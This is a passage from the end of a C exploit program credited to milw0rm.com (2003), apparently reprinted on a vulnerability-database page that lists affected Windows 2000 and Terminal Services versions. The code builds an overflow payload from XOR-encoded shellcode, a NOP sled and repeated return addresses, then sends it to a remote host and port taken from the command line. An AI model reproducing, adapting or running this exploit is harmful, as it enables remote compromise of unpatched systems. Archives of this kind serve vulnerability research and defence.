break;
}
}
for (i=0;i<SHELLCODELEN;i++) shellcode[i] ^= xorkey;
/* Leading NOP run takes half of the space left after the shellcode. */
for (i=0;i<(buffsize-SHELLCODELEN)/2;i++) buffer[i] = NOP;
prologue[XOROFF] = xorkey;
*(short int*)(prologue+SOFF) = SHELLCODELEN;
/* strncat() appends at the first NUL, i.e. right after the NOP run. */
strncat(buffer,prologue,buffsize);
prologuelen = strlen(buffer);
for (i=prologuelen;i<SHELLCODELEN+prologuelen;i++) buffer[i] =
shellcode[i-prologuelen];
prologuelen = strlen(buffer);
buffer[prologuelen] = NOP;
buffer[prologuelen+1] = NOP;
buffer[prologuelen+2] = NOP;
buffer[prologuelen+3] = NOP;
/* (x+3) & ~3 rounds up to the next multiple of 4; from there the rest of
 * the buffer is filled with retaddr, one long per 4 bytes. */
for (i=(prologuelen+3) & (~3);i<buffsize;i+=sizeof(retaddr)) *
(long*)(buffer+i) = retaddr;
buffer[buffsize] = 0;
/* Raw payload is echoed to stdout before anything is sent. */
printf ("%s",buffer);
#ifdef DEBUGGEE_FLOW
__asm {
mov eax, ptr1
call eax
}
#else
SendRequest(argv[1],atoi(argv[2]));
#endif
WSACleanup();
return (0);
}
// milw0rm.com [2003-06-01]
Products Mentioned
Configuration 0
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000 >> Version *
Microsoft>>Windows_2000_terminal_services >> Version *
Microsoft>>Windows_2000_terminal_services >> Version *
Microsoft>>Windows_2000_terminal_services >> Version *
Microsoft>>Windows_2000_terminal_services >> Version *
References